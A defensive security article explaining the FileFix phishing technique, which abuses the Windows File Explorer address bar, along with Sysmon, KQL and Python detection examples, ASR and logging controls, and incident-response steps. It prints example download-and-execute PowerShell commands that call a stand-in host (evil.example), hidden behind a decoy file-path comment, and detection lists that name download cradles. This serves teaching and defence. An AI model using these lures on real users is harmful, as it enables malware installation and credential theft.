FileFix Attack: How Crooks Hijack the File Explorer Address Bar to Run PowerShell (And How to Stop It)

By Fanny Engriana · 7 min read

For most of 2024 and early 2025, the social-engineering trick that kept landing infostealers on Windows machines was ClickFix: a fake CAPTCHA or "fix this error" page that told victims to press Win+R, paste a command, and hit Enter. Defenders adapted. We taught users that the Run dialog is sacred ground, EDR vendors started flagging explorer.exe spawning powershell.exe after a Run-box launch, and detection rates climbed.

Attackers responded with a cleaner variant called FileFix. It abuses something almost nobody thinks of as a command prompt: the address bar at the top of every File Explorer and file-upload dialog. In my experience securing small-business endpoints, this one catches people who would never fall for the Run-box trick, because pasting a "file path" into File Explorer feels completely normal. That instinct is exactly what gets exploited.

FileFix was first documented publicly by the security researcher known as mr.d0x in mid-2025, and threat actors began folding it into live phishing kits within weeks. Below is how the technique actually works, why it slips past habits you have already trained, and the concrete steps that stop it on both managed and unmanaged Windows fleets.

What FileFix Actually Does

The Windows File Explorer address bar is not just a breadcrumb display. Type a command into it and press Enter, and Explorer hands it off the same way the Run dialog does. Type powershell and a shell opens. Type a full command line and it runs with the user's privileges, parented to whichever process owns the window: explorer.exe for a standalone Explorer window, or the browser process when the address bar belongs to the file-open dialog a web page spawned.

FileFix weaponizes that behavior through a phishing page. The flow looks like this:

  • The victim lands on a page claiming a document has been shared with them, that they need to "verify" a file, or that they must open a path their "IT department" sent.
  • The page has a Copy button next to what looks like an innocent file path, for example \\company-share\HR\Q2-Review.pdf.
  • The page also (often) triggers the OS file-open dialog by using an HTML file input, giving the user a real File Explorer window to paste into.
  • When the victim clicks Copy, the clipboard does not just contain that path. It contains a PowerShell command, with the harmless-looking path tacked on as a comment so the visible portion looks legitimate.

That last point is the trick. The clipboard payload looks roughly like this:

powershell -w hidden -c "iwr https://evil.example/a.ps1 | iex" # \\company-share\HR\Q2-Review.pdf

Everything after the # is a PowerShell comment, so it is ignored at execution time. The decoy relies on how a paste lands in a single-line field: the caret ends up at the end of the text, so the field scrolls to show the tail. Live kits pad the gap between the command and the # with a long run of spaces, which pushes the command off the left edge and leaves only the plausible-looking path in view. The victim believes they pasted a file path, presses Enter, the hidden download-and-execute runs, and an infostealer such as StealC, a Lumma-style grabber, or a remote access tool lands on disk. The -w hidden (-WindowStyle Hidden) flag suppresses the console window so nothing flashes on screen.
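To make the decoy mechanism concrete, here is an added Python example (not code from the original article or from the mr.d0x research). It splits a constructed clipboard payload into the part PowerShell executes and the comment it ignores, then approximates what a narrow address bar shows once the caret lands at the end of the pasted text. The payload string, the 60-space padding and the field widths are assumptions for illustration; the evil.example and company-share names come from the payload quoted above.

```python
"""Anatomy of a FileFix clipboard payload (constructed example, not a real sample)."""

# The string a FileFix page plants on the clipboard. The run of spaces between the
# command and the comment is what pushes the decoy path into view once the address
# bar scrolls to the caret at the end of the pasted text. Padding length is assumed.
PAYLOAD = (
    'powershell -w hidden -c "iwr https://evil.example/a.ps1 | iex"'
    + " " * 60
    + r"# \\company-share\HR\Q2-Review.pdf"
)


def split_comment(command: str) -> tuple[str, str]:
    """Return (executed, comment) for a single-line PowerShell command.

    '#' starts a comment only outside quotes; the scanner tracks single and double
    quotes so a '#' inside a quoted URL or string is not mistaken for one.
    """
    quote = None
    for i, ch in enumerate(command):
        if quote:
            if ch == quote:
                quote = None
        elif ch in ('"', "'"):
            quote = ch
        elif ch == "#":
            return command[:i].rstrip(), command[i + 1:].strip()
    return command.rstrip(), ""


def visible_tail(text: str, width: int) -> str:
    """Approximate a single-line field after a paste: the caret sits at the end,
    so the field scrolls to show the last `width` characters."""
    return text[-width:]


def inspect_paste(payload: str, width: int = 40) -> dict:
    """What the shell runs versus what the victim saw in a field `width` chars wide."""
    executed, decoy = split_comment(payload)
    seen = visible_tail(payload, width)
    return {
        "executed": executed,
        "decoy": decoy,
        "seen": seen.strip(),
        # The trick only works if no part of the launcher survives in the visible window.
        "command_hidden": executed.split()[0] not in seen,
    }


if __name__ == "__main__":
    for width in (40, 200):
        view = inspect_paste(PAYLOAD, width)
        print(f"field width {width:>3}: victim sees {view['seen']!r}")
        print(f"              hidden={view['command_hidden']}  executes {view['executed']!r}")
```

The `width=200` case is the Notepad check from later in the article in miniature: once the whole string is visible, the launcher is in plain sight and the decoy collapses.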

Why It Beats ClickFix Awareness Training

The defensive message for ClickFix was blunt: "Never paste anything into the Run box." That advice does not transfer. Pasting a path into File Explorer is something legitimate users do every day, and the file-open dialog appears as part of a normal-looking workflow rather than via a keyboard shortcut nobody recognizes. FileFix also sidesteps the Win+R launch chain that many detections keyed on. When the paste goes into the file-open dialog a browser spawned, the command's parent is the browser process (chrome.exe, msedge.exe, firefox.exe) rather than explorer.exe, so a rule written strictly for explorer.exe → powershell.exe misses it; when the paste goes into a standalone Explorer window, the parent is explorer.exe, one of the noisiest, most-whitelisted processes on Windows.

How to Detect FileFix Activity

The good news is that FileFix still produces a specific parent-child process relationship: a window-owning process (explorer.exe or a browser) launching a scripting engine with a hostile command line. The parent alone is not enough, because opening PowerShell from the Start menu or taskbar also parents to explorer.exe. Build detections on the parent-child pair combined with the command-line indicators.

Sysmon and EDR Process-Tree Rules

If you run Sysmon, watch Event ID 1 (process creation) for these children where the parent is explorer.exe or a browser process (chrome.exe, msedge.exe, firefox.exe):

  • powershell.exe or pwsh.exe
  • cmd.exe
  • wscript.exe / cscript.exe
  • mshta.exe

Ignore conhost.exe: every console program spawns it as a child, not a parent, so it carries no signal here.

A user double-clicking a document does not spawn PowerShell from Explorer, and a user opening a terminal from the Start menu spawns it with a bare command line. When you see explorer.exe (or a browser) → powershell.exe with flags like -w hidden, -enc (Base64-encoded command), -nop (no profile), or a download cradle (iwr, Invoke-WebRequest, DownloadString, iex), treat it as high-confidence malicious. In Microsoft Defender for Endpoint, this Kusto query surfaces it, with the browser parents included so the file-open-dialog variant is covered:

DeviceProcessEvents
| where InitiatingProcessFileName in~ ("explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe")
| where FileName in~ ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe")
| where ProcessCommandLine has_any ("hidden", "-enc", "iex", "DownloadString", "Invoke-WebRequest", "iwr")
| project Timestamp, DeviceName, AccountName, InitiatingProcessFileName, FileName, ProcessCommandLine
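As an added example (not code from the original article or from Microsoft), here is the same parent-child-plus-command-line logic in Python, run over constructed Sysmon-style events. It widens the parent set to the browsers that host the file-open dialog, decodes -EncodedCommand payloads (Base64 of UTF-16LE) before scanning them, and shows that a plain Start-menu launch of PowerShell is not flagged. All process paths, command lines and the evil.example URLs are constructed sample data.

```python
"""Triage process-creation events (Sysmon Event ID 1 field names) for FileFix-style
launches. Sample events are constructed for illustration, not real telemetry."""
import base64
import re

# Processes that own a File Explorer window or a file-open dialog. A paste into a
# standalone Explorer window parents to explorer.exe; a paste into the dialog a
# browser opened parents to the browser process instead.
DIALOG_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# (regex, label): hidden window, encoded command, no-profile flag, download cradles.
INDICATORS = [
    (r"-w(?:indowstyle)?\s+hidden", "hidden window"),
    (r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", "encoded command"),
    (r"-nop\b|-noprofile", "no profile"),
    (r"\biwr\b|invoke-webrequest|downloadstring|invoke-expression|\biex\b|net\.webclient",
     "download cradle"),
]


def decode_encoded_command(cmdline: str) -> str:
    """Return the script hidden behind -EncodedCommand (Base64 of UTF-16LE), or ''."""
    m = re.search(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def command_indicators(cmdline: str) -> list[str]:
    """Labels of every indicator present in the command line or its decoded payload."""
    text = cmdline + " " + decode_encoded_command(cmdline)
    return [label for pattern, label in INDICATORS if re.search(pattern, text, re.I)]


def triage(event: dict) -> dict:
    """Alert only when a dialog-owning parent spawns a script host with a hostile command line."""
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    child = event["Image"].rsplit("\\", 1)[-1].lower()
    cmdline = event.get("CommandLine", "")
    hits = command_indicators(cmdline)
    return {
        "parent": parent,
        "child": child,
        "indicators": hits,
        "decoded": decode_encoded_command(cmdline),
        "alert": parent in DIALOG_PARENTS and child in SCRIPT_HOSTS and bool(hits),
    }


def alerts(events: list[dict]) -> list[dict]:
    """Run triage over a batch and keep only the events that alert."""
    results = [triage(e) for e in events]
    return [r for r in results if r["alert"]]


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ENCODED = base64.b64encode("iwr http://evil.example/b.ps1 | iex".encode("utf-16-le")).decode()

# Constructed events, in order: Explorer-window paste, browser-dialog paste carrying an
# encoded payload, a benign Start-menu launch of PowerShell, an ordinary document open.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": r'powershell -w hidden -c "iwr https://evil.example/a.ps1 | iex" # \\company-share\HR\Q2-Review.pdf'},
    {"ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "Image": PS,
     "CommandLine": f"powershell -nop -w hidden -enc {ENCODED}"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": f'"{PS}"'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe report.txt"},
]

if __name__ == "__main__":
    for r in alerts(SAMPLE_EVENTS):
        print(f"{r['parent']} -> {r['child']}: {', '.join(r['indicators'])}")
        if r["decoded"]:
            print(f"  decoded: {r['decoded']}")
```

Decoding the encoded command before matching matters: a kit that Base64-encodes the cradle leaves no "iwr" or "iex" in the raw command line, and a detection that only string-matches the visible arguments sees nothing but a hidden-window flag.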

Turn On PowerShell Logging

You cannot investigate what you do not record. Enable all three layers of PowerShell logging through Group Policy under Computer Configuration → Administrative Templates → Windows Components → Windows PowerShell:

  • Script Block Logging (Event ID 4104) captures the actual code executed, even when it was obfuscated or Base64-encoded on the command line.
  • Module Logging (Event ID 4103) records pipeline execution details for the modules you enable it for.
  • Transcription writes a full session transcript to a protected file share for forensic review.

Script Block Logging is the single most valuable one here, because FileFix payloads are almost always encoded or remote-fetched, and 4104 (in the Microsoft-Windows-PowerShell/Operational log) records each script block as it runs, after decoding, so the fetched second stage is captured in plain text even though it never touched disk.

How to Block FileFix (Prevention)

Detection tells you it happened. The goal is to make sure it cannot. Layer these controls.

1. Microsoft Defender Attack Surface Reduction Rules

ASR rules stop the execution chain even on otherwise unmanaged endpoints, and they are free with Defender. Enable these in block mode (not audit) once you have validated them:

  • Block execution of potentially obfuscated scripts – catches the encoded PowerShell payloads FileFix relies on.
  • Block process creations originating from PSExec and WMI commands – limits lateral movement after a foothold.
  • Block all Office applications from creating child processes – closes the adjacent document-based delivery path.

Deploy with PowerShell or Intune. Use Add-MpPreference rather than Set-MpPreference when adding a rule: Set-MpPreference replaces the existing rule list, so running it for one rule silently drops the others you already configured. Example for the obfuscated-script rule, first in audit mode and then in block mode:

Add-MpPreference -AttackSurfaceReductionRules_Ids 5BEB7EFE-FD9A-4556-801D-275E5FFC04CC -AttackSurfaceReductionRules_Actions AuditMode
Add-MpPreference -AttackSurfaceReductionRules_Ids 5BEB7EFE-FD9A-4556-801D-275E5FFC04CC -AttackSurfaceReductionRules_Actions Enabled

Roll these out in audit mode first for a week, review what would have been blocked (Event ID 1122 in the Microsoft-Windows-Windows Defender/Operational log), then flip to enforce. I have seen a poorly-tested ASR rule break a legitimate line-of-business script, so validate before enforcing fleet-wide.

2. Constrain or Remove PowerShell for Standard Users

Most office workers never need an interactive PowerShell session. Two strong options:

  • Constrained Language Mode, enforced through a WDAC (Windows Defender Application Control) policy, blocks the .NET calls the second stage of a download cradle depends on: New-Object Net.WebClient, Add-Type and reflection fail. It does not stop a cmdlet-based cradle such as iwr | iex from fetching its payload, because Invoke-WebRequest and Invoke-Expression remain available in CLM; what it does is force the fetched script to run in the same constrained mode, so the stealer's loader cannot do what it needs to. Treat CLM as a limiter, not a blocker.
  • Application control with WDAC or AppLocker to allow only signed, approved scripts. This is the most durable fix because it does not rely on recognizing a specific technique.

3. Block Command Execution from the Explorer Address Bar

You can disable the address bar's ability to run arbitrary commands through Group Policy. Under User Configuration β†’ Administrative Templates β†’ Windows Components β†’ File Explorer, the policy "Remove the Address bar" is heavy-handed but available for high-risk kiosk-style accounts. A lighter approach is removing the run history and restricting the Run command, though the cleanest mitigation remains application control on the scripting engines themselves, since that blocks the payload no matter how it is launched.

4. Web and Email Filtering

FileFix pages are delivered the same way every other phishing lure is: links in email, malicious ads, and compromised sites. Make sure your secure email gateway and DNS filtering (Cloudflare Gateway, Cisco Umbrella, or even Quad9 for tiny shops) are catching newly-registered domains and known phishing infrastructure. Block downloads of .ps1, .hta, and unsigned scripts at the proxy.

What to Tell Your Users

Awareness still matters, but the message has to evolve past "don't use the Run box." The accurate, durable rule is:

  • Never paste anything from a website into File Explorer, the address bar, the Run dialog, or a terminal. No legitimate document-sharing workflow asks you to copy a "path" from a web page and paste it into Windows.
  • If a page tells you to copy something and paste it anywhere in Windows to "verify," "fix," or "open" a file, it is an attack. Close the tab.
  • Real shared files arrive as a download or a link you click, not a string you paste into the operating system.
  • When in doubt, paste the clipboard contents into Notepad first. If a "file path" turns out to start with powershell or contains a URL, you just caught an attack.

That Notepad tip is the one I push hardest with small-business staff. It takes three seconds, it is harmless, and it exposes the decoy-comment trick instantly because the hidden command becomes visible in plain text.

If You Think a Machine Was Hit

FileFix delivers infostealers and remote access tools, which means the real damage is credential theft within minutes of execution. Treat any confirmed run as a credential-compromise incident, not just a malware cleanup:

  • Isolate the host from the network immediately. Do not just "run an antivirus scan" and move on.
  • Pull the evidence while the box is offline: PowerShell 4104 logs, Sysmon process events, the user's browser profile timestamps, and any new scheduled tasks or run keys.
  • Rotate credentials the user touched on that machine, starting with email, VPN, and any saved browser passwords. Infostealers grab browser-stored credentials, cookies, and session tokens, so password rotation alone is not enough – invalidate active sessions too.
  • Revoke session cookies and tokens for cloud accounts (Microsoft 365, Google Workspace) because stolen session cookies let attackers bypass MFA. Force a global sign-out.
  • Rebuild rather than clean if you cannot confidently scope what ran. Reimaging is cheaper than a second incident from a missed implant.

The Bigger Pattern

FileFix is one entry in a fast-moving family of "paste-this-to-fix-it" attacks, and it will not be the last. The underlying problem is that Windows has several places where pasted text becomes executed code, and attackers will keep cycling through them as defenders harden each one. The Run dialog, the File Explorer address bar, the file-open dialog, terminal windows, and even browser developer consoles have all been used this way.

The defenses that hold up across all of these variants are the ones that do not depend on recognizing the specific lure: application control that allows only approved scripts, ASR rules that block obfuscated execution, PowerShell logging that gives you visibility, and a clear user rule that nothing copied from a web page ever gets pasted into Windows itself. Get those four in place and FileFix stops being a threat regardless of how the phishing page dresses it up.

Start with PowerShell Script Block Logging and the three Defender ASR rules above today – they are the highest-impact, lowest-friction wins. Then work toward application control as your durable, technique-agnostic backstop. The attackers have already moved past ClickFix. Your defenses should be built to outlast whatever comes after FileFix too.
